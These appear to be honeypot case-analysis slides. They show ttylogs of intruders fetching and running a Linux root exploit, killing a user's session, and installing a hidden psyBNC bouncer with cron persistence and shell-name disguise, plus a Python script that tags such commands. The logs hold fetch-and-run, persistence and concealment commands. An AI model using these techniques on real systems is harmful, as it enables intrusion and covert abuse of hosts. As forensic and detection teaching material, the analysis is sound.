HoneyNet case analysis: break-ins and the set-up of an IRC proxy (psyBNC)

presentation slide


Data sample


Use tcptrace to find the connections that carry the most traffic in each pcap. Each line of its brief output names the two endpoints, gives the packet count in each direction (a-to-b as "N>", b-to-a as "N<") and says whether the whole connection, SYN to FIN, was captured ("(complete)"). In the two samples below the inbound connection to port 31337, the connections to IRC ports 6667/6669 and the one on port 6969 are the bouncer's traffic; 38.100.19.122:80 is gabanu.webng.com, the host the psyBNC kit was later fetched from.

=======> 6257825 Feb 26 04:01 /var/log/pcap/1235588461/log
==============================================================================
672: [Honey Pot IP]:3670 - 38.100.19.122:80 (ayq2ayr)       373>   371<  (complete)
624: 172.158.157.116:1289 - [Honey Pot IP]:22 (auy2auz)     369>   292<  (complete)
729: [Honey Pot IP]:4565 - 194.109.20.90:6667 (bda2bdb)     262>   222<
507: 172.158.157.116:1288 - [Honey Pot IP]:22 (aly2alz)     257>   217<  (complete)
710: 172.158.157.116:1290 - [Honey Pot IP]:31337 (bbo2bbp)  137>   141<  (complete)

=======> 1388600 Apr 14 19:00 /var/log/pcap/1239703261/log
==============================================================================
2: [Honey Pot IP]:6969 - 89.32.158.213:1043 (c2d)          2265>  1868<
1: 208.83.20.130:6667 - [Honey Pot IP]:1603 (a2b)          2170>  2245<
3: 194.109.20.90:6669 - [Honey Pot IP]:1537 (g2h)           198>   237<

The ttylog of the first session (22 Feb) shows the intruder logging in as guest, changing that account's password, and running a local root exploit, which fails: each of the three attempts ends with "vmsplice: Bad address", the result on a kernel that is patched against the vmsplice() bug this exploit targets. The intruder then kills PID 28389, the login shell of the other guest session (pts/0, from 210.207.152.69), and leaves.

START at: Sun Feb 22 23:20:44 2009



bash-3.1$  passwd
Changing password for user guest.
Changing password for guest
(current) UNIX password: 
New UNIX password: 
Retype new UNIX password: 
passwd: all authentication tokens updated successfully.
bash-3.1$ uname -a
Linux pc18 2.6.18-53.1.14.el5 #1 SMP Wed Mar 5 11:36:49 EST 2008 i686 i686 i386 GNU/Linux
bash-3.1$ cd /var/tmp
bash-3.1$ wget geocities.com/vizitainiad/a.tgz
--23:22:03--  http://geocities.com/vizitainiad/a.tgz
Resolving geocities.com... 66.218.77.68
Connecting to geocities.com|66.218.77.68|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5597 (5.5K) [application/x-compressed]
Saving to: `a.tgz'


 0% [                                        ] 0           --.-K/s             
100%[=======================================>] 5,597       32.7K/s   in 0.2s   

23:22:06 (32.7 KB/s) - `a.tgz' saved [5597/5597]

bash-3.1$ tar xzvf a.tgz
a
a.c
bash-3.1$ rm -rf a.tgz a.c
bash-3.1$ ./a
-----------------------------------
 Linux Local Root Exploit
 Haxoreala By Mickey
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7f07000 .. 0xb7f39000
[-] vmsplice: Bad address
bash-3.1$ ./a
-----------------------------------
 Linux Local Root Exploit
 Haxoreala By Mickey
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7f93000 .. 0xb7fc5000
[-] vmsplice: Bad address
bash-3.1$ ./a
-----------------------------------
 Linux Local Root Exploit
 Haxoreala By Mickey
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7f20000 .. 0xb7f52000
[-] vmsplice: Bad address
bash-3.1$ rm -rf a
bash-3.1$ hostname
pc18
bash-3.1$ cat /proc/cpuinfo
processor	: 0
vendor_id	: GenuineIntel
cpu family	: 6
model		: 15
model name	: Intel(R) Xeon(R) CPU            5120  @ 1.86GHz
stepping	: 8
cpu MHz		: 1866.102
cache size	: 4096 KB
fdiv_bug	: no
hlt_bug		: no
f00f_bug	: no
coma_bug	: no
fpu		: yes
fpu_exception	: yes
cpuid level	: 10
wp		: yes
flags		: fpu vme de pse tsc msr pae mce cx8 apic mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss nx lm constant_tsc up pni ds_cpl cx16 lahf_lm
bogomips	: 3746.07
bash-3.1$ ps ax
  PID TTY      STAT   TIME COMMAND
    1 ?        Ss     0:02 init [3]
    2 ?        S      0:00 [migration/0]
    3 ?        SN     0:00 [ksoftirqd/0]
    4 ?        S      0:00 [watchdog/0]
    5 ?        S<     0:00 [events/0]
    6 ?        S<     0:00 [khelper]
    7 ?        S<     0:00 [kthread]
   10 ?        S<     0:00 [kblockd/0]
   11 ?        S<     0:00 [kacpid]
   67 ?        S<     0:00 [cqueue/0]
   70 ?        S<     0:00 [khubd]
   72 ?        S<     0:00 [kseriod]
  135 ?        S      0:00 [pdflush]
  136 ?        S      0:00 [pdflush]
  137 ?        S<     0:04 [kswapd0]
  138 ?        S<     0:00 [aio/0]
  292 ?        S<     0:00 [kpsmoused]
  323 ?        S<     0:00 [scsi_eh_0]
  324 ?        S<     0:02 [kjournald]
  352 ?        S<     0:00 [kauditd]
  386 ?        S<s    0:00 /sbin/udevd -d
  662 ?        S<     0:00 [ata/0]
  663 ?        S<     0:00 [ata_aux]
 1065 ?        S<     0:00 [kmpathd/0]
 1541 ?        S<sl   0:00 auditd
 1543 ?        S<s    0:00 python /sbin/audispd
 1562 ?        Ss     0:00 syslogd -m 0
 1565 ?        Ss     0:00 klogd -x
 1621 ?        Ssl    0:00 /usr/sbin/named -u named
 1681 ?        Ss     0:00 portmap
 1707 ?        Ss     0:00 rpc.statd
 1754 ?        Ss     0:00 rpc.idmapd
 1844 ?        Ss     0:03 /usr/sbin/vmware-guestd --background /var/run/vmware-
 1867 ?        Ss     0:00 dbus-daemon --system
 1915 ?        Ssl    0:00 pcscd
 1940 ?        Ss     0:00 /usr/sbin/acpid
 1959 ?        Ss     0:00 /usr/sbin/sshd
 1976 ?        Ss     0:00 xinetd -stayalive -pidfile /var/run/xinetd.pid
 1995 ?        SLs    0:00 ntpd -u ntp:ntp -p /var/run/ntpd.pid -g
 2011 ?        Ss     0:00 /usr/sbin/dovecot
 2012 ?        S      0:00 dovecot-auth
 2037 ?        Ss     0:00 sendmail: accepting connections
 2045 ?        Ss     0:00 sendmail: Queue runner@01:00:00 for /var/spool/client
 2062 ?        Ss     0:00 gpm -m /dev/input/mice -t exps2
 2079 ?        S      0:00 /usr/sbin/nss_pcache off /etc/httpd/alias
 2081 ?        Ssl    0:01 /usr/sbin/httpd
 2098 ?        Ss     0:00 crond
 2101 ?        S      0:00 pop3-login
 2102 ?        S      0:00 pop3-login
 2103 ?        S      0:00 pop3-login
 2104 ?        S      0:00 imap-login
 2105 ?        S      0:00 imap-login
 2107 ?        S      0:00 imap-login
 2131 ?        Ss     0:00 squid -D
 2133 ?        S      0:01 (squid) -D
 2135 ?        Ss     0:00 (unlinkd)
 2171 ?        Ss     0:00 xfs -droppriv -daemon
 2202 ?        Ss     0:00 /usr/sbin/atd
 2218 ?        Ss     0:00 hald
 2219 ?        S      0:00 hald-runner
 2226 ?        S      0:00 hald-addon-acpi: listening on acpid socket /var/run/a
 2233 ?        S      0:00 hald-addon-keyboard: listening on /dev/input/event0
 2242 ?        S      0:01 hald-addon-storage: polling /dev/hdc
 2266 ?        S      0:00 /usr/bin/perl -w /bin/ntpmon
 2269 tty1     Ss+    0:00 /sbin/mingetty tty1
 2270 tty2     Ss+    0:00 /sbin/mingetty tty2
 2281 tty3     Ss+    0:00 /sbin/mingetty tty3
 2282 tty4     Ss+    0:00 /sbin/mingetty tty4
 2290 tty5     Ss+    0:00 /sbin/mingetty tty5
 2291 tty6     Ss+    0:00 /sbin/mingetty tty6
 3973 ?        S      0:00 /usr/sbin/httpd
 3974 ?        S      0:00 /usr/sbin/httpd
 3975 ?        S      0:00 /usr/sbin/httpd
 3976 ?        S      0:00 /usr/sbin/httpd
 3977 ?        S      0:00 /usr/sbin/httpd
 3978 ?        S      0:00 /usr/sbin/httpd
 3979 ?        S      0:00 /usr/sbin/httpd
 3980 ?        S      0:00 /usr/sbin/httpd
28386 ?        Ss     0:00 sshd: guest [priv]
28388 ?        S      0:00 sshd: guest@pts/0
28389 pts/0    Ss+    0:00 -bash
28390 pts/1    Ss+    0:00 /bin/bash
28391 ?        S      0:00 /bin/sh /bin/numr0 1 x001
28392 ?        R      2:45 /bin/numr1 1
28393 ?        S      0:00 /bin/numr2 1 1 2 8081
28463 ?        Ss     0:00 sshd: guest [priv]
28475 ?        S      0:00 sshd: guest@pts/2
28478 pts/2    Ss+    0:00 -bash
28481 pts/3    Ss     0:00 /bin/bash
28484 ?        S      0:00 /bin/sh /bin/numr0 3 x003
28485 ?        R      1:06 /bin/numr1 3
28486 ?        S      0:00 /bin/numr2 1 1 2 8083
28611 ?        Ss     0:00 sshd: unknown [priv]
28612 ?        S      0:00 sshd: unknown [net]
28613 pts/3    R+     0:00 ps ax
bash-3.1$ w
 23:23:07 up 2 days, 14:05,  2 users,  load average: 1.96, 1.05, 0.42
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
guest    pts/0    210.207.152.69   23:18    4:11   0.00s  0.06s sshd: guest [pr
guest    pts/2    62.118.0.131     23:20    0.00s  0.01s  0.02s sshd: guest [pr
bash-3.1$ kill -9 28389
bash-3.1$ w
 23:23:24 up 2 days, 14:06,  1 user,  load average: 1.97, 1.09, 0.44
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
guest    pts/2    62.118.0.131     23:20    0.00s  0.01s  0.02s sshd: guest [pr
bash-3.1$ kill -9 0

STOP  at: Sun Feb 22 23:23:31 2009


The intruder installs psyBNC after breaking into the guest account (second session, 26 Feb). The kit is unpacked into a directory named " " (a single space) under /tmp, so that it is easy to overlook in a directory listing; the bouncer binary is shipped under the name httpd; the ./fuck helper sets up a crontab entry (echoed in the log) that runs /tmp/ /redone/y2kupdate every minute, the usual way a bouncer is brought back after a reboot or a kill; and the bouncer listens on port 31337.

START at: Thu Feb 26 03:28:59 2009

bash-3.1$ 
bash-3.1$ a
bash: a: command not found
bash-3.1$ cat /etc/hosts
# Do not remove the following line, or various programs
# that require network functionality will fail.
[delete].99.129   [delete]1 [delete]1.[HoneyPot Domain]
[Honey Pot IP]    pc18 pc18.[HoneyPot Domain]
127.0.0.1         localhost localhost.localdomain
::1               localhost6.localdomain6 localhost6
bash-3.1$ uname -a
Linux pc18 2.6.18-53.1.14.el5 #1 SMP Wed Mar 5 11:36:49 EST 2008 i686 i686 i386 GNU/Linux
bash-3.1$ passwd
Changing password for user guest.
Changing password for guest
(current) UNIX password: 
New UNIX password: 
Retype new UNIX password: 
Sorry, passwords do not match.
New UNIX password: 
BAD PASSWORD: is too similar to the old one
New UNIX password: 
Retype new UNIX password: 
passwd: all authentication tokens updated successfully.
bash-3.1$ cd /tmp
bash-3.1$ ls
bash-3.1$ wget
wget: missing URL
Usage: wget [OPTION]... [URL]...

Try `wget --help' for more options.
bash-3.1$ ls
bash-3.1$ cd /tmp
bash-3.1$  mkdir " " 
bash-3.1$ cd " "
bash-3.1$ wget gabanu.webng.com/redone.tar.gz
--03:32:32--  http://gabanu.webng.com/redone.tar.gz
Resolving gabanu.webng.com... 38.100.19.122, 38.100.19.123
Connecting to gabanu.webng.com|38.100.19.122|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 471040 (460K) [application/x-gzip]
Saving to: `redone.tar.gz'

 0% [                                        ] 0           --.-K/s
100%[=======================================>] 471,040     41.8K/s   in 11s

03:32:51 (40.2 KB/s) - `redone.tar.gz' saved [471040/471040]

bash-3.1$ tar xvf redone.tar.gz
redone/
redone/scripts/
redone/scripts/INFO
redone/scripts/DEFAULT.SCRIPT
redone/scripts/example/
redone/scripts/example/DEFAULT.SCRIPT
redone/lang/
redone/lang/INFO
redone/lang/english.lng
redone/motd/
redone/motd/INFO
redone/kik
redone/proc
redone/psybnc.conf
redone/httpd
redone/hide
redone/run
redone/config
redone/log/
redone/log/INFO
redone/help/
redone/help/DCCCHAT.TXT
....
redone/help/ENCRYPT.TXT
redone/help/LINKFROM.TXT
redone/help/BREHASH.TXT
redone/help/SETUSERNAME.TXT
redone/fuck
redone/config.h
bash-3.1$ cd redone
bash-3.1$ ls
config    fuck  hide   kik   log   proc         run
config.h  help  httpd  lang  motd  psybnc.conf  scripts
bash-3.1$ ./config private 31337
PSYBNC Configure By ReD_oNe
PSYBNC.SYSTEM.PORT1=31337
PSYBNC.SYSTEM.HOST1=*
PSYBNC.HOSTALLOWS.ENTRY0=*;*
USER0.USER.LOGIN=private
USER0.USER.PASS=*
USER0.USER.RIGHTS=1
bash-3.1$ ./fuck
* * * * * /tmp/ /redone/y2kupdate >/dev/null 2>&1
bash-3.1$ ./run
.-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-.
,----.,----.,-.  ,-.,---.,--.  ,-.,----.
| O || ,-' \ \/ / | o || \| || ,--'
| _/ _\ \  \  /  | o< | |\ || |__
|_| |____/ |__|  |___||_| \_| \___|
Version 2.3.1 (c) 1999-2002
the most psychoid
and the cool lam3rz Group IRCnet
`-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=tCl=-'
Configuration File: redone
Language File: psyBNC Language File - English
No logfile specified, logging to log/psybnc.log
Listening on: 0.0.0.0 port 31337
psyBNC2.3.1-cBtITLdDMSNp started (PID 7847)
bash-3.1$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
distcache:x:94:94:Distcache:/:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
radiusd:x:95:95:radiusd user:/:/bin/false
squid:x:23:23::/var/spool/squid:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/sbin/bash
ldap:x:55:55:LDAP User:/var/lib/ldap:/bin/false
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
gdm:x:42:42::/var/gdm:/sbin/nologin
dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin
cto:x:30004:30004:Chief Technical Officer:/home/cto:/sbin/bash
guest:x:30005:30005:Demo guest account:/home/guest:/sbin/bash
demo:x:30006:30006:Demo for IEE:/home/demo:/sbin/bash
bash-3.1$ 

STOP  at: Thu Feb 26 03:35:55 2009

The intruder disguises the running psyBNC as a shell (sessions of 21 and 25 Mar). A fresh psyBNC 2.3.2-4 is unpacked into /tmp/" ", the psybnc binary is renamed to bash, and PATH is set to '.' so that typing bash starts the bouncer from the current directory; it then appears in ps simply as "bash". In the second session the earlier copy (PID 15611) is killed, the binary is renamed again to sh and started the same way.

START at: Sat Mar 21 19:44:33 2009

ls
bash: cd: /tmpls: No such file or directory
bash-3.1$ cd /tmp/" "
bash-3.1$ ls
bash-3.1$ wget http://helpbnc.ucoz.net/stuff/PsyLinux.tgz
--19:44:56--  http://helpbnc.ucoz.net/stuff/PsyLinux.tgz
Resolving helpbnc.ucoz.net... 208.100.61.2
Connecting to helpbnc.ucoz.net|208.100.61.2|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 573709 (560K) [application/octet-stream]
Saving to: `PsyLinux.tgz'

 0% [                                        ] 0           --.-K/s
100%[=======================================>] 573,709     163K/s    in 3.4s

19:45:01 (163 KB/s) - `PsyLinux.tgz' saved [573709/573709]

bash-3.1$ tar zxvf PsyLinux.tgz
psybnc/
psybnc/makefile.out
psybnc/tools/
psybnc/tools/chkenv
psybnc/tools/sys
....
psybnc/src/p_idea.c
psybnc/src/bsd-setenv.c
psybnc/src/ssl.cnf
psybnc/src/p_crypt.c
psybnc/CHANGES
psybnc/psybnc
psybnc/motd/
psybnc/motd/INFO
psybnc/FAQ
psybnc/Makefile
bash-3.1$ cd psybnc
bash-3.1$ ls
CHANGES   README     help          makesalt  psybnc.conf  src
COPYING   SCRIPTING  lang          menuconf  psybncchk    targets.mak
FAQ       TODO       log           motd      salt.h       tools
Makefile  config.h   makefile.out  psybnc    scripts
bash-3.1$  mv psybnc bash
bash-3.1$ chmod +x *
bash-3.1$ cat psybnc.conf
PSYBNC.SYSTEM.PORT1=31337
PSYBNC.SYSTEM.HOST1=*
PSYBNC.HOSTALLOWS.ENTRY0=*;*
bash-3.1$ PATH+'.'
bash: PATH+.: command not found
bash-3.1$ PAth='.'
bash-3.1$ bash
[guest@pc18 psybnc]$ PATH='.'
[guest@pc18 psybnc]$ bash
.-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-.
,----.,----.,-.  ,-.,---.,--.  ,-.,----.
| O || ,-' \ \/ / | o || \| || ,--'
| _/ _\ \  \  /  | o< | |\ || |__
|_| |____/ |__|  |___||_| \_| \___|
Version 2.3.2-4 (c) 1999-2003
the most psychoid
and the cool lam3rz Group IRCnet
`-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=tCl=-'
Configuration File: psybnc.conf
Language File: psyBNC Language File - English
No logfile specified, logging to log/psybnc.log
Listening on: 0.0.0.0 port 31337
psyBNC2.3.2-4-cBtITLdDMSNp started (PID 29855)
[guest@pc18 psybnc]$ 

STOP  at: Sat Mar 21 19:47:24 2009


START at: Wed Mar 25 20:50:55 2009

ls
bash: /tmls: No such file or directory
bash-3.1$ cd /tmp
bash-3.1$ ls
bash-3.1$  cd " "
bash-3.1$ ls
PsyLinux.tgz  psybnc
bash-3.1$ ps -x
Warning: bad syntax, perhaps a bogus '-'? See /usr/share/doc/procps-3.2.7/FAQ
  PID TTY      STAT   TIME COMMAND
15611 ?        S      0:00 bash
15625 ?        S      0:00 sshd: guest@pts/0
15627 pts/1    Ss     0:00 /bin/bash
15638 pts/1    R+     0:00 ps -x
bash-3.1$ kill -9 15611
bash-3.1$ ls
PsyLinux.tgz  psybnc
bash-3.1$ cd psybnc/
bash-3.1$ ls
CHANGES   SCRIPTING  lang          motd             salt.h
COPYING   TODO       log           psybnc.conf      scripts
FAQ       bash       makefile.out  psybnc.conf.old  src
Makefile  config.h   makesalt      psybnc.pid       targets.mak
README    help       menuconf      psybncchk        tools
bash-3.1$ mv bash sh
bash-3.1$ PATH='.'
bash-3.1$ sh
.-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-.
,----.,----.,-.  ,-.,---.,--.  ,-.,----.
| O || ,-' \ \/ / | o || \| || ,--'
| _/ _\ \  \  /  | o< | |\ || |__
|_| |____/ |__|  |___||_| \_| \___|
Version 2.3.2-4 (c) 1999-2003
the most psychoid
and the cool lam3rz Group IRCnet
`-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=tCl=-'
Configuration File: psybnc.conf
Language File: psyBNC Language File - English
No logfile specified, logging to log/psybnc.log
Listening on: 0.0.0.0 port 31337
psyBNC2.3.2-4-cBtITLdDMSNp started (PID 15643)
bash-3.1$ 

STOP  at: Wed Mar 25 20:54:15 2009
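The same pattern of commands recurs across the three ttylog sessions above (fetch a tarball into a temp directory, unpack it, run it from the current directory, change the account password, kill a competing session, hide the bouncer behind a shell name and PATH='.'). The block below is an added example, not part of the original slides: it pulls the typed commands out of a ttylog and tags them with a small, hypothetical indicator rule set. The sample log is a condensed version of the sessions on this page; the rule names and patterns are the author-of-this-example's choice and should be tuned to the prompts and tooling of the environment being monitored.

```python
import re

# Constructed excerpt condensed from the three attacker sessions on this page
# (prompts and commands as the honeypot's ttylog recorded them; output trimmed).
SAMPLE_TTYLOG = """\
START at: Sun Feb 22 23:20:44 2009
bash-3.1$ passwd
Changing password for user guest.
bash-3.1$ cd /var/tmp
bash-3.1$ wget geocities.com/vizitainiad/a.tgz
bash-3.1$ tar xzvf a.tgz
bash-3.1$ rm -rf a.tgz a.c
bash-3.1$ ./a
[-] vmsplice: Bad address
bash-3.1$ kill -9 28389
STOP  at: Sun Feb 22 23:23:31 2009
START at: Thu Feb 26 03:28:59 2009
bash-3.1$ mkdir " "
bash-3.1$ cd " "
bash-3.1$ wget gabanu.webng.com/redone.tar.gz
bash-3.1$ tar xvf redone.tar.gz
bash-3.1$ ./fuck
* * * * * /tmp/ /redone/y2kupdate >/dev/null 2>&1
bash-3.1$ ./run
STOP  at: Thu Feb 26 03:35:55 2009
START at: Sat Mar 21 19:44:33 2009
bash-3.1$ mv psybnc bash
bash-3.1$ chmod +x *
bash-3.1$ PATH='.'
[guest@pc18 psybnc]$ bash
STOP  at: Sat Mar 21 19:47:24 2009
"""

# The two prompt shapes seen in this honeypot's logs: "bash-3.1$ " and "[user@host dir]$ ".
PROMPT_RE = re.compile(r"^(?:bash-\d+\.\d+\$|\[[^\]]+\]\$)\s+(?P<cmd>.*)$")
SESSION_RE = re.compile(r"^(START|STOP)\s+at:\s+(.*)$")
# Five schedule fields followed by a command: a crontab line echoed in the output.
CRON_RE = re.compile(r"^(?:[\d*,/-]+\s+){5}\S")

# (tag, pattern) applied to each typed command. Hypothetical rule set for illustration.
RULES = [
    ("download",        re.compile(r"^(?:wget|curl|ftp|lynx|fetch)\b\s+\S")),
    ("unpack-archive",  re.compile(r"^tar\s+-?[a-z]*x")),
    ("run-from-cwd",    re.compile(r"^\./\S+")),
    ("password-change", re.compile(r"^passwd\b")),
    ("kill-session",    re.compile(r"^kill\s+-9\s+\d+")),
    # PATH that contains "." as a component: '.' or .:$PATH or $PATH:.
    ("path-hijack",     re.compile(r"^(?:export\s+)?PATH=(?:.*[':=])?\.(?:[':]|$)")),
    ("rename-to-shell", re.compile(r"^mv\s+\S+\s+(?:bash|sh|httpd|sshd|crond)$")),
    ("hidden-dir",      re.compile(r'^(?:mkdir|cd)\s+"\s+"')),
    ("cleanup",         re.compile(r"^rm\s+-rf?\b")),
]


def parse_ttylog(text):
    """Return (session_start, kind, payload) events; kind is 'cmd' or 'out'."""
    session, events = None, []
    for line in text.splitlines():
        s = SESSION_RE.match(line)
        if s:
            if s.group(1) == "START":
                session = s.group(2)
            continue
        p = PROMPT_RE.match(line)
        if p:
            if p["cmd"].strip():
                events.append((session, "cmd", p["cmd"].strip()))
        else:
            events.append((session, "out", line))
    return events


def indicators(events):
    """(session_start, tag, text) for every command or output line a rule matches."""
    hits = []
    for session, kind, text in events:
        if kind == "cmd":
            hits.extend((session, tag, text) for tag, rx in RULES if rx.search(text))
        elif CRON_RE.match(text):
            hits.append((session, "cron-persistence", text))
    return hits


if __name__ == "__main__":
    for session, tag, text in indicators(parse_ttylog(SAMPLE_TTYLOG)):
        print(f"{session:28s} {tag:16s} {text}")
```

The per-session grouping matters for the report: one download in a session is noise, while download, unpack, run-from-cwd and cleanup inside three minutes, followed by a kill of another user's shell, is the whole story of the 22 Feb session in four tags.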

Examining the honeypot's processes from the root console (16 Apr). Three things to note. First, ps shows PID 6599 as "/usr/local/apache/bin/httpd -DSSL"; that is the argv[0] the bouncer sets for itself, not the path of its executable. lsof and /proc/6599/exe give the real path, /tmp/ /redone/httpd, marked "(deleted)": the kit directory was removed after the bouncer started, so the binary now exists only as the running image. The same lsof output shows it listening on port 6969 (acmsoda in /etc/services) and connected to Undernet servers. Second, PID 14522 is the later bouncer, the psybnc binary renamed to bash, now living under /home/guest/" "/psybnc and listening on 31337. Third, the deleted binary is recovered through /proc/6599/exe. The session below writes it to /tmp/httpd on the honeypot itself and then deletes it; when the copy is meant as evidence, write it to external storage and record a hash before doing anything else on the host.

Script started on Thu 16 Apr 2009 08:57:27 AM HKT
fortress:/root> ssh pc18/
Last login: Wed Apr 15 09:44:37 2009 from [delete]-fw.[HoneyPot Domain]
[root@pc18 ~]# tcsh
[root@pc18 ~]# cd
pc18:/root> cd /tmp
pc18:/tmp> ls
 /  ./  ../  .font-unix/  .ICE-unix/
pc18:/tmp> cd " "
pc18:/tmp/ > ls
./  ../
pc18:/tmp/ > ls -lR
.:
total 12
drwxr-xr-x 2 guest guest 4096 Apr 16 04:34 ./
drwxrwxrwt 5 root  root  4096 Apr 12 04:25 ../
pc18:/tmp/ > ls -lR
.:
total 12
drwxr-xr-x 2 guest guest 4096 Apr 16 04:34 ./
drwxrwxrwt 5 root  root  4096 Apr 12 04:25 ../
pc18:/tmp/ > ps -ef
UID        PID  PPID  C STIME TTY          TIME CMD
root         1     0  0 Mar01 ?        00:00:01 init [3]
root         2     1  0 Mar01 ?        00:00:00 [migration/0]
root         3     1  0 Mar01 ?        00:00:03 [ksoftirqd/0]
root         4     1  0 Mar01 ?        00:00:00 [watchdog/0]
root         5     1  0 Mar01 ?        00:00:01 [events/0]
root         6     1  0 Mar01 ?        00:00:00 [khelper]
root         7     1  0 Mar01 ?        00:00:00 [kthread]
root        10     7  0 Mar01 ?        00:00:07 [kblockd/0]
root        11     7  0 Mar01 ?        00:00:00 [kacpid]
root        67     7  0 Mar01 ?        00:00:00 [cqueue/0]
root        70     7  0 Mar01 ?        00:00:00 [khubd]
root        72     7  0 Mar01 ?        00:00:00 [kseriod]
root       135     7  0 Mar01 ?        00:00:02 [pdflush]
root       136     7  0 Mar01 ?        00:00:02 [pdflush]
root       137     7  0 Mar01 ?        00:01:10 [kswapd0]
root       138     7  0 Mar01 ?        00:00:00 [aio/0]
root       291     7  0 Mar01 ?        00:00:00 [kpsmoused]
root       320     7  0 Mar01 ?        00:00:00 [scsi_eh_0]
root       321     7  0 Mar01 ?        00:00:50 [kjournald]
root       349     7  0 Mar01 ?        00:00:00 [kauditd]
root       383     1  0 Mar01 ?        00:00:00 /sbin/udevd -d
root       681     7  0 Mar01 ?        00:00:00 [ata/0]
root       682     7  0 Mar01 ?        00:00:00 [ata_aux]
root      1060     7  0 Mar01 ?        00:00:00 [kmpathd/0]
root      1536     1  0 Mar01 ?        00:00:11 auditd
root      1538  1536  0 Mar01 ?        00:00:12 python /sbin/audispd
root      1557     1  0 Mar01 ?        00:00:15 syslogd -m 0
root      1560     1  0 Mar01 ?        00:00:00 klogd -x
rpc       1677     1  0 Mar01 ?        00:00:00 portmap
rpcuser   1703     1  0 Mar01 ?        00:00:00 rpc.statd
root      1749     1  0 Mar01 ?        00:00:00 rpc.idmapd
root      1839     1  0 Mar01 ?        00:01:22 /usr/sbin/vmware-guestd --background /var/run/vmware-guestd.pid
dbus      1862     1  0 Mar01 ?        00:00:00 dbus-daemon --system
root      1910     1  0 Mar01 ?        00:00:00 pcscd
root      1935     1  0 Mar01 ?        00:00:00 /usr/sbin/acpid
root      1954     1  0 Mar01 ?        00:00:05 /usr/sbin/sshd
root      1971     1  0 Mar01 ?        00:00:00 xinetd -stayalive -pidfile /var/run/xinetd.pid
ntp       1990     1  0 Mar01 ?        00:00:00 ntpd -u ntp:ntp -p /var/run/ntpd.pid -g
root      2032     1  0 Mar01 ?        00:00:00 sendmail: accepting connections
smmsp     2040     1  0 Mar01 ?        00:00:00 sendmail: Queue runner@01:00:00 for /var/spool/clientmqueue
root      2057     1  0 Mar01 ?        00:00:00 gpm -m /dev/input/mice -t exps2
root      2099     1  0 Mar01 ?        00:00:10 crond
root      2126     1  0 Mar01 ?        00:00:00 squid -D
squid     2128  2126  0 Mar01 ?        00:00:24 (squid) -D
squid     2130  2128  0 Mar01 ?        00:00:00 (unlinkd)
xfs       2166     1  0 Mar01 ?        00:00:00 xfs -droppriv -daemon
apache    2187  6576  0 Apr12 ?        00:00:00 /usr/sbin/httpd
apache    2188  6576  0 Apr12 ?        00:00:00 /usr/sbin/httpd
apache    2189  6576  0 Apr12 ?        00:00:00 /usr/sbin/httpd
apache    2190  6576  0 Apr12 ?        00:00:00 /usr/sbin/httpd
apache    2191  6576  0 Apr12 ?        00:00:00 /usr/sbin/httpd
apache    2192  6576  0 Apr12 ?        00:00:00 /usr/sbin/httpd
